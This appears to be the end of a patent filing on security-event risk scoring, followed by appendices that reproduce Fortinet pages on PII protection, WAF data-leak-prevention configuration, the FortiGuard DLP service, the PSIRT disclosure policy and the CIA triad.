**13**. The non-transitory computer-readable storage medium of claim **11**, wherein the method further comprises:

matching a system vulnerability with the security event;

scanning the targeted device of the security event for the system vulnerability; and

increasing the risk level of the security event if the system vulnerability exists in the targeted device of the security event; and

decreasing the risk level of the security event if the system vulnerability does not exist in the targeted device of the security event.

**14**. The non-transitory computer-readable storage medium of claim **13**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability based on a common

vulnerabilities and exposures (CVE) attribute, a BugTraq attribute or a S3CVE attribute of the security event.

**15**. The non-transitory computer-readable storage medium of claim **13**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability with the security event based on a local knowledge database.

* * * * *

# APPENDIX I

FREE PRODUCT DEMO | DOWNLOADS | FORTICLOUD LOGIN

FORTINET Products Solutions Support Partners Company Contact Us

FORTIGUARD LABS THREAT INTELLIGENCE »

CyberGlossary › Cyber Compliance › PII: Key Insights on Protecting Personally Identifiable Information

# PII: Key Insights on Protecting Personally Identifiable Information

Learn about Personally Identifiable Information (PII), what qualifies as PII, and how hackers can abuse it.

STREAMLINE REGULATORY COMPLIANCE    2025 THREAT LANDSCAPE REPORT

PII Meaning | What Qualifies As PII | Threat Categories | How To Manage PII | FAQs

## What is Personally Identifiable Information (PII)?

**Personally identifiable information (PII)** refers to information employed by a company or organization to identify someone, make contact with them, or find them. While this PII meaning applies to any circumstance, the term "PII" is often used within a legal context, particularly when it refers to information security concerns.

There are two basic kinds of PII: non-sensitive and sensitive. Non-sensitive PII can be freely sent to other parties without being secured, with no harm resulting to the individual. Sensitive PII, on the other hand, has to be sent and kept in a secure form because if it were disclosed, considerable harm could befall the individual.

Protecting PII is crucial in any business relationship, specifically because not doing so could involve an abuse of trust. Also, when an individual's information is shared with the wrong parties, harm can be done to their reputation, finances, and personal life. In addition, an organization that is lax in the way it protects PII can quickly lose the trust of current and potential clients, which could significantly impact their bottom line.

### Why Do We Need To Secure PII?

Today, organizations are collecting more personal data of employees than ever before. This growing data footprint makes PII a prime target for cybercriminals. When exposed or stolen, PII can lead to serious consequences, such as identity theft, financial fraud, and ultimately, reputational damage.

As organizations continuously capture and process PII via biometric authentication techniques like facial recognition and fingerprint scans, they must prioritize securing this sensitive data. Threat actors don't need vast information. Even minor information can help them create fake identities, open unauthorized accounts, or facilitate criminal activities. Safeguarding personal privacy and maintaining compliance requires robust security controls, visibility across systems, and zero-trust access to any data that can uniquely identify an individual.

## PII In Privacy Policy/Privacy Law

Many countries and territories have measures in place to protect the personal information of their citizens. While the designation of "personal information" varies slightly from one area to the next, many of the guiding principles are the same.

### United States

According to the National Institute of Standards and Technology (NIST), personally identifiable information includes someone's name, biometric information, such as physical data and descriptions, and Social Security number (SSN). These can all be used to track the identity of an individual.

### Australia

Personal information in Australia is defined under the Privacy Act 1988. It refers to information about someone, including subjective opinions, when it is clear who the individual is. Even if it is not "crystal clear" who is being referred to, the classification still applies if their identity can be reasonably ascertained.

## Compliance Resources

- Cybersecurity
- Types of Cyber Attacks
- IT vs OT Cybersecurity
- AI Cybersecurity
- Cyber Threat Intelligence
- Cybersecurity Management
- Network Security
- Data Security
- Email Security
- Endpoint Security
- Web Security
- Enterprise Security
- Cybersecurity Mesh

## Quick Links

- Fortinet Products
- Fortinet Demos
- Analyst Reports
- FortiGuard Threat Intelligence
- Contact Us

REQUEST A QUOTE | FREE DEMO | CONTACT US

Need help? Chat with us!

### The European Union

Personal information in countries under the European Union (EU) is defined as information that identifies a person, including physical, mental, physiological, economic, cultural, or social identifying factors. Personal information also includes an ID number, whether issued by a state entity or a private one.

### New Zealand

Personal information in New Zealand includes any information relating to someone who is alive and identifiable. This encompasses their contact information, name, financial situation, and their history of purchases.

### Canada

Canada's Personal Information Protection and Electronic Documents Act (PIPEDA) stipulates that personal data includes anything that can identify an individual, including personal information online, whether on its own or in conjunction with other data.

**Streamline and Automate Your Regulatory Compliance**

Watch how you can reduce your security risk and ensure timely compliance with government regulations.

Stream now

## What Qualifies as PII?

There are a number of things that qualify as PII, and according to the NIST, they include an individual's:

1. Full name
2. Home address
3. Face
4. ID number
5. Email
6. Vehicle plate or registration number
7. Passport number
8. Fingerprints
9. Handwriting
10. Driver's license
11. Credit card number
12. Date of birth
13. Digital identity
14. Place of birth
15. Phone number
16. Genetic information
17. Screen name
18. Login information

REQUEST A QUOTE
FREE DEMO
CONTACT US

## PII Compliance: What You Need to Know to Stay Protected

There are multiple laws outlining how to maintain PII compliance. Some countries have more than one because protecting personal information varies depending on the industries or types of individuals involved.

### GDPR

The General Data Protection Regulation (GDPR) was instituted by the EU, and it aims to facilitate privacy policy and data protection within the EU and the European Economic Area (EEA). The regulation also deals with sending PII outside the boundaries of the EEA and the EU.

GDPR focuses on many of the potential problems, such as data breaches, by aiming to regulate the cybersecurity and legal fabric of the data within the EU—protecting it from being exploited or misused—while at the same time showing respect for the individuals who own the data. Therefore, the fines levied against people who are out of compliance with PII requirements are stiff. They can climb to as high as €20 million or 4% of a company's global revenue—whichever amount is higher.

### GLBA

The Gramm-Leach-Bliley Act (GLBA) is also known by the name "Financial Modernization Act." It is designed to regulate how financial institutions share or protect customers' private information. PII compliance to satisfy GLBA tends to involve financial institutions communicating with their clients and customers regarding how they use their sensitive data. It also directs financial institutions to inform customers that they have the right to opt out of sharing their data.

GLBA makes it mandatory to equip each employee of a financial institution with the knowledge and tools to remain in compliance. In addition, anyone with access to sensitive data is tracked within the financial institution's system.

Need help? Chat with us!

### PCI DSS

The Payment Card Industry Data Security Standard (PCI DSS) manages and identifies the information security policies necessary for organizations that handle credit card information. It is sometimes referred to as "PCI," and it makes sure companies that work with credit card data keep a certain level of cybersecurity in place.

This may include an information security policy such as a firewall, antivirus software, data encryption service, restricted access to credit card data, logging, scanning for vulnerability, and regular updates.

### HIPAA

HIPAA stands for the Health Insurance Portability and Accountability Act, and it is designed to protect the sensitive data of patients. The PII definition used within the context of HIPAA is protected health information (PHI). This includes PII information regarding not just who a patient is but also the kinds of treatment they get and the health conditions they have.

To protect patients' personal data, HIPAA dictates regulations that limit physical access to personal information, control how it is transferred, as well as how people use workstations where personal data can be accessed. In addition, HIPAA requires regular audits of data protection procedures like data encryption.

### Australian NDB

The NDB refers to Australia's Notifiable Data Breaches Scheme, which is a law introduced by the Office of the Australian Information Commissioner. This law necessitates the notification of any individual affected by a data breach within a specific period of time after the breach was discovered. The law also requires individuals and companies to notify government officials.

## The Most Common PII Threat Categories

Once an organization has figured out the kinds of PII it is responsible for, they should also classify the different types of data. This will make it easier to assess the threats posed by the mishandling of each kind of data. The categories may include:

1. **Identification**: This includes data that can be used to identify an individual.
2. **Data combination**: In some cases, a combination of multiple types of data is used to identify someone.
3. **Accessible data**: When and how often data is accessed, as well as who has access, can help clarify how to best manage it.
4. **PII data compliance**: In many instances, local compliance requirements, such as PCI DSS, HIPAA, or EU GDPR, should guide how personal data is managed.

REQUEST A QUOTE
FREE DEMO
CONTACT US




Click to See Larger Image

### What Do Hackers Do With PII?

When hackers steal credit card information, they can use it to make purchases while pretending to be the cardholder. However, greater dangers result when hackers piece together combinations of personal data. Many institutions require several data points to verify someone's identity. In some cases, a hacker may get some data, such as an email address, and then use it to obtain more PII, eventually having enough to gain access to more secure accounts such as an individual's bank.

Hackers can use email phishing to get someone's password or SSN. For this reason, organizations like the Department of Labor (DOL) disclose that while they may collect data through an email request, they will always outline how the data will be used. Phishing scammers may try to emulate the look and feel of a legitimate service provider to lull their targets into a false sense of security.

Need help? Chat with us!

When a threat actor has the information they need, they can pretend to be the individual and then commit cyber crimes in their name or sell their information via the dark web. Cyber criminals have also been known to masquerade as the individual and then penetrate their circle of friends on social media, gathering more information they then use to impersonate the target.

## Who is Responsible for Safeguarding PII?

Responsibility for PII varies depending on the information and the jurisdiction. Sometimes, it is the responsibility of the organization that receives it, and in some cases, the responsibility is shared between the individual and the company that takes their data.

## Challenges of Managing PII

Properly handling PII can mean the difference between being legally compliant or in violation of the law. However, managing PII comes with several significant obstacles.

### 1. Too much information

Often, a company has so much PII data, it is hard to keep track of it all. For this reason, it is advisable to only collect the bare minimum necessary for smooth operation.

### 2. Covering the whole threat landscape

PII can be accessed both digitally and physically. This results in a diverse, ever-changing, and expanding attack surface.

### 3. Unsecured Internet-of-Things (IoT) devices

As more and more companies implement a bring-your-own-device (BYOD) policy, it is getting harder to make sure all devices are secure.

### 4. Human error

Employees—even those with the best intentions—often make mistakes. They may incorrectly delete data, leaving it exposed to a hacker, or fall for a phishing scam. It is also common for employees to use weak passwords to make it easier to remember their login information. The key is to educate them regarding the steps they should take to safeguard their PII and those of their fellow workers and customers.

REQUEST A QUOTE
FREE DEMO
CONTACT US

# How To Manage PII

There are several things you and members of your organization can do to manage PII. Some of the most helpful steps are listed below. It is important to take all of these measures into account, not just a few.

Some companies use double opt-in, which requires users to confirm subscriptions via email, to limit the exposure of sensitive data. Regardless of the method you choose, a little upfront investment of time and energy to bolster your infrastructure and adjust policies and practices is well worth it. Your efforts can prevent you and your organization from a potentially disastrous hack.

### 1. Only collect/store what you need

The safest thing to do is to store only as much PII as you need. Once you choose what to store, ascertain your legal obligations. Then choose which has to be kept on a short-term or long-term basis. If the data can be deleted in the short term, set up procedures for doing so.

### 2. Monitor and train employees

Provide adequate training to employees about PII data and their related responsibilities. Also, keep track of who accesses personal data and when.

### 3. Create a BYOD security policy

When employees are allowed to bring their own devices, make sure they meet security requirements before accessing the network. Educate each employee about the measures, and make sure they conform.

### 4. Use monitoring systems

You need to monitor who has access to PII and when, particularly because some jurisdictions require you to alert them when PII has been compromised. This can be accomplished in several ways, including alerts that are automatically logged by the system whenever someone accesses PII.

Need help? Chat with us!

### 5. Maximize data security

Limit the amount of data that gets transferred to reduce the chances of hackers stealing it. Use firewalls to shield your network. Consistently perform timely security updates, and fix vulnerabilities as soon as they are discovered.

### a) Data masking

Data masking involves making sure data is transmitted or stored with only the bare minimum of data exposed. A common example is when only the last four digits of a credit card are shown during an online purchase.

### b) Ethical walls

Implementing ethical walls involves only letting those who "need to know" access sensitive data. You can also make sure each member of your organization can only view data that does not present a conflict of interest.

### c) Privileged user monitoring

Privileged user monitoring is when you monitor all privileged access to databases and files. Anytime something suspicious happens, the activity is blocked and an alert is created.

### d) Sensitive data access auditing

When engaging in sensitive data access auditing, an organization keeps track of every time people access sensitive information. If anything out of the ordinary happens, access can be blocked and an alert can be initiated. Examples include:

**1. Secure audit trail archiving**

Secure audit trail archiving makes sure that activity conducted in connection with PII is both audited and retained for one to seven years. This helps a company comply with legal regulations and policies, as well as produce a forensic trail that can assist with an investigation.

**2. User rights management**

User rights management involves identifying unusual or inappropriate user behavior and then limiting access accordingly. This could include removing user accounts that have been dormant for a set period of time.

**3. User tracking**

User tracking traces user activity to detect when users may expose sensitive data, either accidentally or with malicious intent. Activity is tracked anytime they are using the organization's network or working on behalf of the company.

As cyber threats evolve, safeguarding all aspects of your network endpoints, cloud, OT, and PII is critical. Protect Your Network with FortiGuard AI.

REQUEST A QUOTE
FREE DEMO
CONTACT US

## Future-Proofing Your Data Privacy: Protecting PII in a Digital World

PII is the data that organizations use to identify, locate, or contact individuals, and, therefore, it plays a crucial role in information security. As businesses gather more personal data, including biometric identifiers, securing it becomes vital to avoid identity theft, financial loss, and reputational damage. Moreover, multiple global privacy regulations, such as GDPR, HIPAA, and PCI DSS, state how organizations must manage and protect this data based on context and industry. If compromised, threat actors can exploit PII through phishing or data misuse, making robust compliance and cybersecurity practices vital for all organizations.

Fortinet offers advanced protection through FortiDLP to help organizations prevent data exposure. It implements AI-enhanced functionality and provides deep visibility, content inspection, and policy enforcement across endpoints, networks, and cloud environments.

## Personally Identifiable Information (PII) FAQs

**Why is protecting PII important?**

**What are the four categories of PII?**

**What are the two types of PII?**

**How to Identify PII Data?**

**How Is PII Collected?**

Need help? Chat with us!

## Speak with an Expert

Please fill out the form and a knowledgeable representative will get in touch with you soon.

First Name *

Last Name *

Job Function *

Job Level *

Company *

Email Address *

Phone: (201) 555-0123 *

Country/Region *

Any specific product, services or solution? (Optional)

I consent to receive promotional communications (which may include phone, email, and social) from Fortinet. I understand I may proactively opt out of communications with Fortinet at anytime.

By clicking submit you agree to the **Fortinet Terms and Conditions** & **Privacy Policy**.

SUBMIT

REQUEST A QUOTE

FREE DEMO

CONTACT US

**PRODUCTS**

**Enterprise**

Secure Networking

User and Device Security

Security Operations

Application Security

FortiGuard Labs Threat Intelligence

**Small Mid-Sized Businesses**

Overview

**Service Providers**

MSSP

Mobile Providers

**PARTNERS**

Overview

Alliances Ecosystem

Find a Partner

Become a Partner

Partner Login

**TRUST CENTER**

Trusted Products

Trusted Company

Trusted Process

Trusted Partners

Product Certifications

**MORE**

About Us

Training

Resources

Ransomware Hub

Support

Downloads

CyberGlossary

Careers

Early Talent Program

Investor Relations

Social Responsibility

Sitemap

Enter Email Address

I want to receive news and product emails. Read our **privacy policy**.

**CONNECT WITH US**

Blogs

Fortinet Community

Email Preference Center

Contact Us

LinkedIn Twitter Youtube

Instagram Facebook RSS

Fortinet European Tour Partnership Fortinet Cup - PGA Americas Fortinet Juventus Partnership Romain Attanasio

LPGA Fortinet Founders Cup 2026 Fortinet and FC Barcelona partnership

Copyright © 2026 Fortinet, Inc. All Rights Reserved.

Terms of Service | Privacy Policy | Notice for California Residents | Do Not Sell Or Share My Personal Information | GDPR | Canadian Accessibility | Cookie Settings

Also of Interest:

Fortinet CVE Analysis | Three of the Biggest Cybersecurity Challenges... |
Why Worry? GDPR Doesn't Apply to Me, Right? | O que são informações de identificação pessoal...

Need help? Chat with us!

# APPENDIX J

Handbook
- Introduction
- Chapter 1: What's New
- Chapter 2: Key Concepts and Features
- Chapter 3: Getting Started
- Chapter 4: Server Load Balancing
- Chapter 5: Link Load Balancing
- Chapter 6: Global Load Balancing
- Chapter 7: Network Security
- Chapter 8: DoS Protection
- Chapter 9: Web Application Firewall
  - Web application firewall basics
  - Web application firewall configuration overview
  - Configuring an OWASP TOP10 profile
  - Configuring a WAF Profile
  - Configuring WAF Action objects
  - Configuring WAF Exception objects
  - Configuring a Web Attack Signature policy
  - Using the Signature Creation Wizard
  - Configuring a URL Protection policy
  - Configuring an Advanced Protection policy
  - Configuring an HTTP Protocol Constraint policy
  - Configuring CSRF protection
  - Configuring brute force attack detection
  - Configuring an SQL/XSS Injection Detection policy
  - Configuring a Bot Detection policy
  - Configuring a Threshold Based Detection policy
  - Configuring a Biometrics Based Detection policy
  - Configuring a Credential Stuffing Defense Policy
  - Configuring a Cookie Security policy

7.2.6

# Configuring sensitive data protection

The Data leak prevention (DLP) feature allows Web Application Firewall (WAF) to prevent information leaks, damage and loss. It provides desensitization and warning measures for sensitive information leaks on websites, such as SSN numbers and credit card information, as well as the leakage of sensitive keywords.

- Detects and identifies private and sensitive data generated on the webpage, offering protective measures.
- Provides a built-in illegal and sensitive keyword library.

**Before you begin:**

- Configure a virtual server with a WAF Profile.

**To configure Data Leakage Prevention**

1. Go to **Web Application Firewall > Sensitive Data Protection > Sensitive Data Type.**
2. Click **Create New**.
3. Complete the configuration.
4.

| | |
|---|---|
| Name | Enter the name of the Sensitive Data Type. You will use the name to select the Sensitive Data Type profile in Data Leak Prevention profiles. No spaces. |
| Description | Comments about this profile. Describe what this profile is used for and what kind of data this regex is used to match. |
| Regex | Specify the regex string used to match sensitive data. There are two pre-defined regex strings named Credit_Card_Number and US_Social_Security_Number. |

5. Click **Save**.
6. Go to the **Data Leak Prevention** tab. Click **Create New**.



7. Complete the configuration and click **Save**.

| | |
|---|---|
| Name | Enter the name of the Data Leak Prevention. You will use the name to select the Data Leak Prevention profile in WAF profiles. No spaces. |
| Status | Enable or disable this profile. Default is disable. |
| Masking | Enable masking to replace sensitive data with asterisks(*). Default is disable.<br>**Note**: When masking is enabled, all target data will be replaced by an asterisk(*) so the threshold value won't take effect here. Masking only works when the action is alert. The connection will be rejected when the action is set as "deny" or "block," so no target data will be replaced. |
| Action | Select the action profile that you want to apply. See Configuring WAF Action objects. The default is Alert. |
| Severity | Set the severity level in the WAF logs for potential attacks detected by the Data Leak Prevention profile.<br>• High<br>• Medium |

Actions

Download PDF

Table of Contents

```
  {2}$|^2014\\d{11}$|^2149\\d{11}$|^2131\\d{11}$|^1800\\d{11}$|^3\\d{15}$"
set description "For credit card numbers from MC, Visa, Amex, Diners/CarteBlanche, Discover/Novus, Enroute,
  and JCB. Matches 341-1111-1111-1111 | 5431-1111-1111-1111 | 30569309025904 Non-Matches 30-5693-0902-5904
  | 5631-1111-1111-1111 | 31169309025904."
next
End
```

**Use it in data-leak-prevention**

```
config security waf data-leak-prevention
edit "dlp"
set status enable -> default disable
set action alert -> default alert,means pass with a security log if hit target
config rule
edit 1
set request-uri-pattern / -> default none,means do not scan the content
set sensitive-data-type Credit_Card_Number -> use data-leak-prevention
next
end
next
end
```

**Configure the waf profile**

```
config security waf profile
edit "WAF"
set data-leak-prevention dlp
next
end
```

← Previous Next →

© 2026 Fortinet, Inc. Privacy Policy Legal

# APPENDIX K

FREE PRODUCT DEMO | DOWNLOADS | FORTICLOUD LOGIN

FORTINET Products Solutions Support Partners Company Contact Us

FORTIGUARD LABS THREAT INTELLIGENCE »

# Data Loss Prevention (DLP) Services - FortiGuard

Comprehensive DLP data-type patterns detect and prevent loss of sensitive data

## Enterprise DLP Service Overview

The FortiGuard Data Loss Prevention (DLP) Service enables the identification and monitoring of an organization's data. It protects against data breaches, insider threats, and data exfiltration. A customizable database of more than 500 predefined data patterns and policies simplifies and expedites DLP deployment and integration into existing environments.

### Centralized Data Security with Predefined DLP Data-Type Patterns

The FortiGuard Data Loss Prevention Service supports centralized data security management with a database that categorizes predefined DLP data-type patterns such as:

- Drivers license for various countries, states (U.S.), and provinces (Canada)
- Tax I.D. numbers for various countries
- Credit card numbers
- Financial records

### Prevent Data Loss and Ensure Regulatory Compliance

FortiGuard DLP enables organizations to detect data loss, preventing sensitive data from leaving the organization, as well as the unwanted destruction of this data. It also helps organizations with data security and compliance with internal and government regulations such as CCPA, PCI-DSS, GDPR, and HIPAA.

REQUEST A QUOTE
FREE DEMO
CONTACT US

### Key Benefits of FortiGuard Data Loss Prevention Service

The FortiGuard DLP service allows organizations to:

- Identify sensitive information across multiple on-premises and cloud-based systems
- Prevent the accidental sharing of data
- Monitor and protect data
- Educate users on how to stay compliant

## FortiGuard DLP Integration with Fortinet Fabric Solutions

The strength of Fortinet's platform-driven approach is to enable coordinated workflows including response while customers benefit from a globalized network effect across Fortinet's worldwide install base. The FortiGuard Data Loss Prevention Service is integrated into the following Fabric solutions:

FortiGate

SD-WAN

FortiSASE

FortiCASB (API CASB)

## FortiGuard Data Loss Prevention Service Use Cases

The FortiGuard DLP Service is critical to ensuring sensitive data does not leak.

PREVENT DATA EXFILTRATION

Stop cybercriminals from stealing your

DETECT INSIDER THREATS

Prevent breaches from within your organization

Protect from negligent data exposure as a

Need help? Chat with us!

sensitive data via cyberattack such as code injection, malware, or phishing.

by malicious former or current employees, contractors, or others who have been given legitimate access to your sensitive information.

result of employees or contractors losing sensitive information or providing access to their account or data.

## Features and Benefits of FortiGuard DLP Service

**COMPREHENSIVE AND UNIFIED DLP SERVICE**

Enables teams to have central policy, management, orchestration, and control over data

**SECURITY FABRIC INTEGRATION**

Collect and share critical event information between solutions

**LESS BURDEN ON IT TEAMS**

Implement FortiGuard DLP Patterns as needed. No internal management is required

## Quick Links

**Free Product Demo**

**Resource Center**

REQUEST A QUOTE

FREE DEMO

CONTACT US

**Free Trials**

**Contact Sales**

Fortinet European Tour Partnership Fortinet Cup - PGA Americas Fortinet Juventus Partnership Romain Attanasio

LPGA Fortinet Founders Cup 2026 Fortinet and FC Barcelona partnership

Copyright © 2026 Fortinet, Inc. All Rights Reserved.

Terms of Service | Privacy Policy | Notice for California Residents | Do Not Sell Or Share My Personal Information | GDPR | Canadian Accessibility | Cookie Settings

Also of Interest: Fortinet CVE Analysis | What Is Data Loss Prevention (DLP)? | What Are DLPaaS And DLP-as-a-Managed-Service? | How Data Loss Prevention (DLP) Monitoring...

REQUEST A QUOTE

FREE DEMO

CONTACT US

Need help? Chat with us!

# APPENDIX L

FortiGuard Labs Research Services Threat Intelligence Support Resources About FORTINET

► Home / PSIRT / PSIRT Policy

# Fortinet Security Vulnerability Policy

## Overview

As a leading vendor in the cybersecurity industry, Fortinet secures the largest enterprise, service provider, and government organizations around the world. As such, it is essential that our products adhere to the highest security assurance standards and are developed with security at the forefront of the products development lifecycle.

At Fortinet, we diligently balance our commitment to the security of our customers and our culture of researcher collaboration and transparency

## Scope

Fortinet product security practices cover the following products, services and systems:

- All our products that have not reached End-of-Life (EoL) milestone. These include hardware, software and SaaS products (cloud services) and products delivered by our wholly-owned subsidiaries.
- Fortinet web and mobile applications, cloud services and supporting network infrastructure.

## Fortinet Product Security Incident Response Team (PSIRT)

The Fortinet Product Security Incident Response Team (PSIRT) is responsible for maintaining security standards for Fortinet products by training teams in secure coding practice, testing product security, and responding to Fortinet product security incidents. Fortinet PSIRT is a dedicated, global team that manages the receipt, investigation, and public reporting of information about security vulnerabilities and issues related to Fortinet products and services. Fortinet defines a security vulnerability as an unintended weakness in a product that could allow an attacker to compromise the integrity, availability, or confidentiality of the product. Fortinet PSIRT works with Fortinet customers, independent security researchers, consultants, industry organizations, and other vendors to accomplish its PSIRT Mission.

Please report non-product issues related to issues in Fortinet IT infrastructure corporate website or other Fortinet internal systems such as email etc. at CSIRT Contact form

## Reporting a Vulnerability

Individuals or organizations that suspect a security issue are strongly encouraged to contact Fortinet. Fortinet welcomes reports from independent researchers, industry organizations, vendors, customers, and other sources concerned with product or network security. The minimal data needed for reporting a security issue is a description of the potential vulnerability.

| | |
|---|---|
| | Please contact the Fortinet Incident Response teams via the web form here by selecting the appropriate vulnerability category. |
| | Customers can report vulnerabilities via the FortiCare customer support portal |

Support requests that are received via email are typically acknowledged within 24 business hours. Ongoing status on reported issues will be determined as needed.

Fortinet adheres to the FIRST Traffic Light Protocol (TLP) v.2.0 labeling scheme for sharing of sensitive data when sensitive information is shared with us. Any sensitive non-public information about vulnerabilities is considered highly confidential, and only individuals who have a legitimate need to know and can add value to the remediation process may access this information until notification.

Further communications with the reporter may be via email. The Fortinet PSIRT supports encrypted messages via PGP/GNU Privacy Guard (GPG). The Fortinet PSIRT public key (key ID 0xC7A59F07) is available at PGP Keys page.

## Responsible disclosure process

Fortinet recognizes and appreciates the important role played by independent security researchers and our customers in collaborating to keep our product ecosystem secure.

Throughout the investigation process, Fortinet strives to work collaboratively with the incident reporter to confirm the nature of the vulnerability, gather required technical information, prioritize remediation based on the potential severity of the vulnerability assessed using CVSS and other factors. When the initial investigation is complete, results will be delivered to the incident reporter along with a plan for resolution and public disclosure. If the incident reporter disagrees with the conclusion, the Fortinet PSIRT will make every effort to address those concerns. The resolution of a reported incident may require upgrades to multiple products that are under active support from Fortinet.

During any investigation, the Fortinet PSIRT manages all sensitive information on a highly confidential basis. Internal distribution is limited to those individuals who have a legitimate need to know and can actively assist in the resolution. Similarly, we ask incident reporters to:

- Maintain strict confidentiality until complete resolutions are available for customers and have been published on the Fortinet website through the appropriate coordinated disclosure or Fortinet has notified you that the issue has been mitigated. We take the security of our customers and infrastructure very seriously, however some issues may take longer than others to resolve.
- Provide full details of the security issue including steps to reproduce and the details of the system where the tests were conducted and a clearly defined impact.
- Refrain from accessing any non-public data. If a vulnerability provides unintended access to data;
  - limit the amount of data you access to the absolute minimum required for effectively demonstrating a Proof of Concept, and
  - cease testing and submit a report immediately if you encounter any user data during testing, such as and without limitation, Personally Identifiable Information (PII), Personal Healthcare Information (PHI), credit card data, or proprietary information.

We also request that reporters DO NOT:

- Cause potential or actual damage to Fortinet, systems, or applications.
- Use an exploit to view unauthorized data or to corrupt data.

- Engage in disruptive testing including but not limited to DoS, fuzzing, automated scanning of cloud services, or any action that could impact the confidentiality, integrity, or availability of information and systems.
- Engage in social engineering (e.g. phishing, vishing, smishing) of Fortinet employees or customers.

With the agreement of the incident reporter, Fortinet PSIRT may acknowledge the reporter's contribution during the public disclosure of the vulnerability.

Fortinet works with NIST for issuance of a Common Vulnerabilities and Exposure ID where required and will publish the details of the vulnerability once resolved.

In the event Fortinet becomes aware of a vulnerability that does not affect a Fortinet product, but does involve another vendor's product, Fortinet may report the issue upstream.

Fortinet does not operate a bug bounty program.

## Commitment to Product Security and Integrity at Fortinet

Fortinet's Secure Development Lifecycle Policy is based on the principle of "Secure by Design, Secure by default". STRIDE based threat modeling is used to identify the potential threats to products and include mitigations against these risks. Robust security testing is employed including tools and techniques such as:

- Static Application Security Testing / Static code analysis built into our build processes (SAST)
- Dynamic application security testing (DAST), vulnerability scanning and fuzzing prior to each release
- SBoM tracking to identify vulnerabilities of open-source software (OSS) and other 3rd party libraries used within the product
- Manual code audit by dedicated security engineers
- Scheduled Internal Penetration Testing
- Scheduled Penetration Testing by independent CREST Certified third parties for all major releases

Vulnerabilities and weaknesses found through these exercises are responded to appropriately and all remediated issues, internal or externally discovered, published via our PSIRT Advisory page.

## Threat Risk Assessment and SLAs

Fortinet uses version 3.1 of the Common Vulnerability Scoring System (CVSS) as part of its standard process of evaluating reported potential vulnerabilities in Fortinet products. The CVSS model uses three distinct measurements or scores that include Base, Temporal, and Environmental calculations which Fortinet PSIRT uses to assign a severity level.

| Severity | Branches to fix (where applicable) | Advisory |
|---|---|---|
| Critical CVSS = 9.0 - 10.0 | All supported versions * | Monthly or Out of cycle PSIRT advisory (timing dependent) CVE Published |
| High CVSS >= 7.0 - 8.9 | All supported versions * | Monthly PSIRT advisory CVE Published |
| Medium CVSS >= 4.0 - 6.9 | Current and prior version | Monthly PSIRT advisory CVE Published |
| Low CVSS >= 2.0 - 3.9 | Fixed in latest supported version | Monthly PSIRT advisory CVE Published |
| Informational CVSS > 0.0 - 1.9 | Fixed in next major version | Release notes (if applicable). |

* Note that for Enhanced Tech products with a rapid release cycle, and where upgrade options are available, this may be limited to the previous four minor versions or limited based on the known number of active instances.

Fortinet reserves the right to deviate from these guidelines in specific cases if additional factors are not properly captured in the CVSS score.

If there is a security issue with a third-party software component that is used in a Fortinet product, Fortinet typically uses the CVSS score provided by the third-party, however, in some cases, Fortinet may adjust the CVSS score to reflect the usage of the component and/or impact to the Fortinet product.

More information about CVSS scoring can be found at http://www.first.org/cvss/

## Communications Plan

Once the minimum requirements are met for remediating a vulnerability in the required releases, Fortinet will publicly disclose via the Fortinet Security Advisory Process:

- A vulnerability advisory is published on the second Tuesday of the month and a Monthly Advisory notice sent.
- Critical vulnerabilities may be published via an out of cycle PSIRT advisory as necessary.
- If Fortinet PSIRT has observed active exploitation of a vulnerability that could lead to increased risk for Fortinet customers, Fortinet may accelerate the publication of a security announcement describing the vulnerability via an Out of Cycle Advisory that may or may not include a complete set of patches or workarounds
- Fortinet reserves the right to deviate from this policy on an exceptional basis.

There are several ways to stay connected and receive the latest security vulnerability information from Fortinet. Review the following table, and subsequent summaries, to determine the appropriate option.

| Website | E-Mail | RSS Feed |
|---|---|---|
| https://fortiguard.fortinet.com/psirt | Register via Support.fortinet.com | https://fortiguard.fortinet.com/rss/ir.xml |

## Safe Harbor

We will not initiate a lawsuit or law enforcement investigation against a researcher in response to reporting a vulnerability if the researcher fully complies with this stated Policy.

Please understand that if your security research involves the networks, systems, information, applications, products, or services of another party that is not Fortinet, that third-party may determine whether to pursue legal action. We cannot and do not authorize security research in the name of other entities. Please refer to that third-party's bug bounty policy, if they have one, or contact the third-party either directly or through a legal representative before initiating any testing on that third-party or their services. If legal action is initiated by a third-party against you and you have complied with this Policy, we will take reasonable steps to make it known that your actions were conducted in compliance with this Policy. While we consider submitted reports to be confidential documents,

please be aware that a court could, despite our objections, order us to share report-related information with a third-party. For clarity, this policy and any actions taken hereunder are not, and should not be understood as, any agreement on our part to defend, indemnify, or otherwise protect you from any third-party action based on your actions.

You are expected, as always, to comply with all applicable laws and regulations.

Please contact us or submit a report to us before engaging in conduct that may be inconsistent with or unaddressed by this policy. We reserve the sole right to make the determination of whether a violation of this policy is accidental or in good faith, and proactive contact to us before engaging in any action is a significant factor in that decision.

## Public Relations or Press Queries

For any media questions regarding a vulnerability in a Fortinet product, please contact pr@fortinet.com.

FORTINET

Contact Us | Legal | Privacy | Partners | Feedback

Copyright © 2026 Fortinet, Inc. All Rights Reserved.

# APPENDIX M

# CIA Triad

Learn what the CIA triad is and why you should use it for finding vulnerabilities.

2025 THREAT LANDSCAPE REPORT

## What Is the CIA Triad?

The three letters in "CIA triad" stand for Confidentiality, Integrity, and Availability. The CIA triad is a common model that forms the basis for the development of security systems. They are used for finding vulnerabilities and methods for creating solutions.

The confidentiality, integrity, and availability of information is crucial to the operation of a business, and the CIA triad segments these three ideas into separate focal points. This differentiation is helpful because it helps guide security teams as they pinpoint the different ways in which they can address each concern.

Ideally, when all three standards have been met, the security profile of the organization is stronger and better equipped to handle threat incidents.



**2025 Global Threat Landscape Report**

Use this report to understand the latest attacker tactics, assess your exposure, and prioritize action before the next exploit hits your environment.

Download Now

## 3 Core Components of CIA Triad & Their Examples

### 1. Confidentiality

Confidentiality involves the efforts of an organization to make sure data is kept secret or private. To accomplish this, access to information must be controlled to prevent the unauthorized sharing of data—whether intentional or accidental. A key component of maintaining confidentiality is making sure that people without proper authorization are prevented from accessing assets important to your business. Conversely, an effective system also ensures that those who need to have access have the necessary privileges.

For example, those who work with an organization's finances should be able to access the spreadsheets, bank accounts, and other information related to the flow of money. However, the vast majority of other employees—and perhaps even certain executives—may not be granted access. To ensure these policies are followed, stringent restrictions have to be in place to limit who can see what.

There are several ways confidentiality can be compromised. This may involve direct attacks aimed at gaining access to systems the attacker does not have the rights to see. It can also involve an attacker making a direct attempt to infiltrate an application or database so they can take data or alter it.

